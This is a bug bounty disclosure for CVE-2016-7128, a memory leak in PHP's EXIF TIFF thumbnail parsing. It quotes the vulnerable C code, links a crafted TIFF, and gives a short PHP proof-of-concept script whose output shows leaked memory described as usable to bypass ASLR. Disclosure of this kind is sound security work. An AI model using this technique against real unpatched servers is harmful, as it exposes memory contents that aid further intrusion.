Internet Bug Bounty: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)

2016-08-1801:06:22

hoangnguyen

hackerone.com

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.005 Low

EPSS

Percentile

71.5%

JSON

I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let take look at code chunk :

if (!ImageInfo-&gt;Thumbnail.data && ImageInfo-&gt;Thumbnail.offset && ImageInfo-&gt;Thumbnail.size && ImageInfo-&gt;read_thumbnail) {
	ImageInfo-&gt;Thumbnail.data = safe_emalloc(ImageInfo-&gt;Thumbnail.size, 1, 0);
	php_stream_seek(ImageInfo-&gt;infile, ImageInfo-&gt;Thumbnail.offset, SEEK_SET);
	fgot = php_stream_read(ImageInfo-&gt;infile, ImageInfo-&gt;Thumbnail.data, ImageInfo-&gt;Thumbnail.size);
	if (fgot &lt; ImageInfo-&gt;Thumbnail.size) {
		EXIF_ERRLOG_THUMBEOF(ImageInfo)
	}
	exif_thumbnail_build(ImageInfo);
}

Because lack of checking ImageInfo->Thumbnail.offset if an attack set ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then php_stream_read return 0 to fgot, because EXIF_ERRLOG_THUMBEOF was defined as :

#define EXIF_ERRLOG_THUMBEOF(ImageInfo)   exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF);

As you can see there is no exit after this error is output.
After that exif_thumbnail_build(ImageInfo) is called. Because this thumbnail I applied is IMAGE_FILETYPE_JPEG so exif_thumbnail_build will return without error.

Finally ImageInfo->Thumbnail.data is no fill by user data that lead to information leak like below, an attacker can leak address and then use it to bypass some protection such as PIE, ASLR,…

Here the tiff file : https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E

Affect : Linux, Mac Os X,Windows
Test script:

<?php
$exif = exif_read_data(‘exif/gen.tiff’,0,0,true);
var_dump($exif);

$thumb = $exif['THUMBNAIL']['THUMBNAIL'];
echo bin2hex($thumb);

Actual result:

$./php exif.php

Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2

Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2
array(11) {
  ["FileName"]=&gt;
  string(8) "gen.tiff"
  ["FileDateTime"]=&gt;
  int(1468986539)
  ["FileSize"]=&gt;
  int(1250)
  ["FileType"]=&gt;
  int(7)
  ["MimeType"]=&gt;
  string(10) "image/tiff"
  ["SectionsFound"]=&gt;
  string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF"
  ["COMPUTED"]=&gt;
  array(10) {
    ["html"]=&gt;
    string(24) "width="128" height="132""
    ["Height"]=&gt;
    int(132)
    ["Width"]=&gt;
    int(128)
    ["IsColor"]=&gt;
    int(0)
    ["ByteOrderMotorola"]=&gt;
    int(0)
    ["ApertureFNumber"]=&gt;
    string(5) "f/1.0"
    ["Thumbnail.FileType"]=&gt;
    int(2)
    ["Thumbnail.MimeType"]=&gt;
    string(10) "image/jpeg"
    ["Thumbnail.Height"]=&gt;
    int(132)
    ["Thumbnail.Width"]=&gt;
    int(128)
  }
  ["XResolution"]=&gt;
  string(21) "1414812756/1414812756"
  ["THUMBNAIL"]=&gt;
  array(5) {
    ["ImageWidth"]=&gt;
    int(128)
    ["ImageLength"]=&gt;
    int(132)
    ["JPEGInterchangeFormat"]=&gt;
    int(1280)
    ["JPEGInterchangeFormatLength"]=&gt;
    int(200)
    ["THUMBNAIL"]=&gt;
    string(200) "" # leak leak
  }
  ["ExposureTime"]=&gt;
  string(21) "1414812756/1414812756"
  ["FNumber"]=&gt;
  string(21) "1414812756/1414812756"
}
00c2a7081e7f000000000.... =&gt; leak leak (00c2a7081e7f =&gt; 0x7f1e08a7c200)